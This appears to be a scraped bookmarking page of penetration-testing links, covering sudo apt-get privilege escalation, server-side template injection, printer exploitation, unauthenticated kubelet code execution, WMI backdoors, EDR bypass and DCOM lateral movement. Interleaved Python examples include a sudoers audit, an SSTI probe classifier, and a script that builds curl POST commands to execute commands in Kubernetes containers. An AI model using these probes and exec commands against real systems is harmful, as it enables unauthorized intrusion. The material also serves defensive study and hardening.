pentest   3879


Linux Privilege Escalation – Using apt-get/apt/dpkg to abuse sudo “NOPASSWD” misconfiguration – Logan S Diomedi – lsdsecurity
There are many well-known and documented attack vectors for the sudo command. Please see my Useful Resources page for the Windows & Linux Privilege Escalation piece that contains a ton of helpful knowledge in this category. Today, we're going to be using a very poorly documented feature in apt-get when a normal user is allowed to execute apt-get as the root user. Let's dive in!
linux  privesc  privilegeescalation  sudo  pentest  security 
2 days ago by whip_lash
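A check for the misconfiguration the post starts from, added here as an example (it is not code from the lsdsecurity post): parse a sudoers file and flag rules that let a user run a package manager, or anything at all, as root without a password. The sudoers text is constructed for the example; the `PACKAGE_TOOLS` set is an assumption about which binaries deserve attention.

```python
"""Flag sudoers rules that let a user run a package manager as root without a
password. Added illustrative code, not from the bookmarked post; the sudoers
text below is constructed for the example."""
import os
import re

# Binaries whose passwordless sudo rules deserve a second look: each can be
# coaxed into running other commands as root (hooks, maintainer scripts, pagers).
PACKAGE_TOOLS = {"apt", "apt-get", "aptitude", "dpkg"}

# Tags that may precede a command list in a sudoers Cmnd_Spec.
TAG_RE = re.compile(
    r"\b(?:NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|LOG_INPUT|NOLOG_INPUT|"
    r"LOG_OUTPUT|NOLOG_OUTPUT):"
)
# who  host = (runas) commands   (the runas part is optional; default is root)
RULE_RE = re.compile(r"^(\S+)\s+(\S+)\s*=\s*(?:\(([^)]*)\)\s*)?(.*)$")
SKIP_PREFIXES = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")

SAMPLE_SUDOERS = """\
# constructed sample /etc/sudoers
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
deploy  ALL=(root) NOPASSWD: /usr/bin/apt-get
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, /usr/bin/dpkg -i *
%devs   ALL=(ALL) NOPASSWD: ALL
ops     ALL=(root) /usr/bin/apt    # password still required
"""


def parse_sudoers(text):
    """Return a list of (who, runas, nopasswd, [commands]) for each user spec.
    Aliases, Defaults and comments are skipped; this is a deliberately simple
    parser, so treat `sudo -l` on the host as the authoritative view."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        who, _host, runas, spec = m.groups()
        nopasswd = "NOPASSWD:" in spec
        commands = [c.strip() for c in TAG_RE.sub("", spec).split(",") if c.strip()]
        rules.append((who, runas or "root", nopasswd, commands))
    return rules


def risky_rules(text):
    """Rules that run a package manager (or ALL) without a password."""
    findings = []
    for who, runas, nopasswd, commands in parse_sudoers(text):
        if not nopasswd:
            continue
        for cmd in commands:
            binary = os.path.basename(cmd.split()[0])
            if cmd == "ALL" or binary in PACKAGE_TOOLS:
                findings.append((who, runas, cmd))
    return findings


if __name__ == "__main__":
    for who, runas, cmd in risky_rules(SAMPLE_SUDOERS):
        print(f"{who} may run {cmd!r} as {runas} with no password")
```

Run against the sample, the `deploy`, `backup` and `%devs` rules are reported and the `ops` rule is not, because it still prompts for a password. On a real host, feed it the output of `sudo -l` or the contents of `/etc/sudoers` and `/etc/sudoers.d/*`.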
Template engines are widely used by web applications to present dynamic data via web pages and emails. Unsafely embedding user input in templates enables Server-Side Template Injection, a frequently critical vulnerability that is extremely easy to mistake for Cross-Site Scripting (XSS), or miss entirely. Unlike XSS, Template Injection can be used to directly attack web servers' internals and often obtain Remote Code Execution (RCE), turning every vulnerable application into a potential pivot point.
templateinjection  webapp  pentest 
4 days ago by whip_lash
• Occurs when invalid user input is embedded into the template
• Often an XSS attack is found but the SSTI is missed
• Can lead to remote code execution (RCE)
• Developer error or intentional exposure
templateinjection  webapp  pentest 
4 days ago by whip_lash
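The two entries above both make the same point: a probe that is merely echoed back is an XSS lead, while a probe the server evaluates is template injection. The following is an added example (not code from the bookmarked PortSwigger material) of the classic `7*7` check that tells the two apart; the canary string, the set of template syntaxes, and the two stand-in web applications are constructed for the example.

```python
"""Tell reflected-but-unevaluated input (look at XSS) apart from Server-Side
Template Injection (the engine evaluated the probe). Added example code, not
from the bookmarked PortSwigger material; the targets below are constructed
stand-ins for a web application."""
import re

CANARY = "zq9k"  # unlikely marker, so "49" is only matched where we injected it

# Arithmetic probes in a few common template syntaxes. A page that only reflects
# echoes the probe back verbatim; an engine that evaluates it prints 49.
PROBES = {
    "jinja2/twig style": "{{7*7}}",
    "freemarker/velocity/mako style": "${7*7}",
    "erb/ejs style": "<%= 7*7 %>",
}


def build_payload(probe):
    return f"{CANARY}{probe}{CANARY}"


def classify(probe, response):
    """'evaluated' = SSTI candidate; 'reflected' = echoed verbatim (XSS
    territory, not SSTI for this syntax); 'absent' = not reflected at all."""
    if build_payload(probe) in response:
        return "reflected"
    if f"{CANARY}49{CANARY}" in response:
        return "evaluated"
    return "absent"


def probe_parameter(send):
    """send(payload) -> response body for one injection point. Returns a
    verdict per template syntax, so the caller can see which engine family
    (if any) is evaluating the input."""
    return {name: classify(p, send(build_payload(p))) for name, p in PROBES.items()}


def fake_jinja_like_app(payload):
    """Constructed stand-in for an app that concatenates user input into a
    Jinja2-style template: anything of the form {{a*b}} is evaluated and
    nothing is HTML-encoded. A real engine would evaluate far more than this."""
    evaluated = re.sub(
        r"\{\{(\d+)\*(\d+)\}\}",
        lambda m: str(int(m.group(1)) * int(m.group(2))),
        payload,
    )
    return f"<p>Hello {evaluated}</p>"


def fake_reflecting_app(payload):
    """Constructed stand-in for a page that merely echoes the parameter."""
    return f"<p>Hello {payload}</p>"


if __name__ == "__main__":
    print(probe_parameter(fake_jinja_like_app))
    print(probe_parameter(fake_reflecting_app))
```

Against the Jinja-like target the `{{7*7}}` probe comes back as `evaluated` while the other syntaxes come back `reflected`; against the echo-only target every syntax is `reflected`. The canary matters: without it a stray `49` in page content would be a false positive, and a verdict of `reflected` for one syntax says nothing about the others, which is exactly why SSTI is easy to write off as XSS.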
PRETty - "PRinter Exploitation Toolkit" LAN Automation Tool - KitPloit - PenTest & Hacking Tools for your CyberSecurity Kit ☣
PRETty is useful when a large number of printers are present on a network. Instead of scanning, logging, and manually running PRET against each individual printer, PRETty will automatically discover and run chosen PRET payloads against all printers on the target network. Additionally, PRETty can be used to automate command/payload delivery to any given list of printers (see the "Lists" section).
printer  pentest 
4 days ago by whip_lash
Favorite tweet:

If you like these kinds of @Burp_Suite tips, here's ~100 pages of them. That was published in 2013 but most of it is still valid.

— Nicolas Grégoire (@Agarri_FR) January 16, 2019
burp  proxy  pentest 
4 days ago by whip_lash
Kubernetes: unauth kubelet API 10250 token theft & kubectl | Carnal0wnage - Attack Research Blog
do a curl -s https://k8-node:10250/runningpods/ to get a list of running pods

With that data, you can craft your POST request to exec within a pod so we can poke around.
kubernetes  pentest  security  vulnerability 
5 days ago by whip_lash
Kubernetes: unauth kubelet API 10250 basic code exec | Carnal0wnage - Attack Research Blog
Unauth API access (10250)

Most Kubernetes deployments provide authentication for this port. But it’s still possible to expose it inadvertently and it's still pretty common to find it exposed via the "insecure API service" option.

Everybody who has access to the kubelet service port (10250), even without a certificate, can execute any command inside the container.
kubernetes  security  pentest  vulnerability 
5 days ago by whip_lash
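The two Carnal0wnage entries above describe the same procedure: list running pods from the kubelet, then POST to its per-container run endpoint. As an added example (not the blog's own code), the script below turns a `/runningpods/` listing into exec targets and the matching curl one-liners, and includes the check a defender wants, whether the port answers without a client certificate at all. The host name `k8-node` is the placeholder from the post, the PodList JSON is constructed and trimmed to the fields used, and `http_get` is a hypothetical callable you would back with a real HTTP client.

```python
"""Turn a kubelet /runningpods/ listing into per-container exec targets, and
check whether a kubelet answers unauthenticated requests at all. Added example,
not Carnal0wnage's code. k8-node is the placeholder host name from the post;
the PodList below is constructed and trimmed to the fields used here."""
import json
import shlex
from urllib.parse import quote

KUBELET = "https://k8-node:10250"

SAMPLE_RUNNINGPODS = json.dumps({
    "kind": "PodList",
    "apiVersion": "v1",
    "items": [
        {"metadata": {"name": "kube-dns-7b8f6c9d-abcde", "namespace": "kube-system"},
         "spec": {"containers": [{"name": "kubedns"}, {"name": "dnsmasq"},
                                 {"name": "sidecar"}]}},
        {"metadata": {"name": "web-0", "namespace": "default"},
         "spec": {"containers": [{"name": "nginx"}]}},
    ],
})


def list_targets(runningpods_json):
    """(namespace, pod, container) for every container in the listing."""
    doc = json.loads(runningpods_json)
    targets = []
    for item in doc.get("items", []):
        ns = item["metadata"]["namespace"]
        pod = item["metadata"]["name"]
        for c in item.get("spec", {}).get("containers", []):
            targets.append((ns, pod, c["name"]))
    return targets


def run_url(ns, pod, container, base=KUBELET):
    """The kubelet's /run/{namespace}/{pod}/{container} endpoint; a POST with a
    form body of cmd=<command> runs that command inside the container."""
    return f"{base}/run/{quote(ns)}/{quote(pod)}/{quote(container)}"


def curl_command(ns, pod, container, cmd="id", base=KUBELET):
    """The equivalent curl one-liner (-k because the kubelet certificate is
    usually self-signed), for pasting into a shell; nothing is executed here."""
    body = shlex.quote(f"cmd={cmd}")
    return f"curl -sk -X POST {run_url(ns, pod, container, base)} -d {body}"


def check_exposure(http_get):
    """http_get(path) -> (status, body), made with no client certificate.
    A kubelet that returns 200 for /runningpods/ to an anonymous caller is the
    misconfiguration the posts describe."""
    status, _body = http_get("/runningpods/")
    if status == 200:
        return "anonymous access allowed"
    if status in (401, 403):
        return "authentication/authorization enforced"
    return f"unexpected status {status}"


if __name__ == "__main__":
    for ns, pod, container in list_targets(SAMPLE_RUNNINGPODS):
        print(curl_command(ns, pod, container))
```

To use `check_exposure` for real, wrap a request that sends no client certificate and returns the status code (for example `urllib.request` with certificate verification disabled, since the kubelet's certificate is rarely trusted by the scanning host). On the kubelet side the fix is to run it with `--anonymous-auth=false` and an authorization mode other than `AlwaysAllow` (typically `--authorization-mode=Webhook`), so that a bare POST to `/run/...` gets a 401 instead of a shell.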
us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent Asynchronous-And-Fileless-Backdoor-wp.pdf
As technology is introduced and subsequently deprecated over time in the Windows operating system, one powerful technology that has remained consistent since Windows NT 4.0 and Windows 95 is Windows Management Instrumentation (WMI). Present on all Windows operating systems, WMI is comprised of a powerful set of tools used to manage Windows systems both locally and remotely.
powershell  wmi  pentest  postexploitation 
5 days ago by whip_lash
GitHub - epinna/tplmap: Server-Side Template Injection and Code Injection Detection and Exploitation Tool
Tplmap assists the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with a number of sandbox escape techniques to get access to the underlying operating system.
injection  template  pentest  webapp 
5 days ago by whip_lash
GitHub - Bashfuscator/Bashfuscator: A fully configurable and extendable Bash obfuscation framework. This tool is intended to help both red team and blue team.
Favorite tweet:

Introducing Bashfuscator : A fully configurable and extendable Bash obfuscation framework : cc @capnspacehook

— Binni Shah (@binitamshah) January 14, 2019
bash  obfuscation  pentest 
6 days ago by whip_lash
Attacking Kubernetes through Kubelet
Favorite tweet:

Attacking Kubernetes through Kubelet :

— Binni Shah (@binitamshah) January 14, 2019
kubernetes  pentest  vulnerability  security 
7 days ago by whip_lash
Bypassing Crowdstrike Falcon detection, from phishing email to reverse shell - Malware - 0x00sec - The Home of the Hacker
When I say bypassing, I mean completely bypassing detection, from the phishing email received by the user to the reverse shell. Something realistic, not just writing malware and seeing if it gets executed.

So if we can't use the classic techniques, how about trying some new (old) trick?

Turns out, it was pretty trivial ¯\_(ツ)_/¯.
malware  pentest  antivirus 
7 days ago by whip_lash
Powershell Script for Enumerating Vulnerable DCOM Applications: DCOMrade
DCOMrade is a PowerShell script that is able to enumerate the possibly vulnerable DCOM applications that might allow for lateral movement, code execution, data exfiltration, etc. The script is built to work with PowerShell 2.0 but will work with all versions above as well.
dcom  windows  pentest  powershell  postexploitation  security 
10 days ago by whip_lash
Lateral Movement via DCOM: Round 2 | enigma0x3
This resulted in identifying the MMC20.Application COM object and its “ExecuteShellCommand” method, which you can read more about here. Thanks to the help of James Forshaw (@tiraniddo), we determined that the MMC20.Application object lacked explicit “LaunchPermissions”, resulting in the default permission set allowing Administrators access:
dcom  security  windows  postexploitation  pentest 
10 days ago by whip_lash
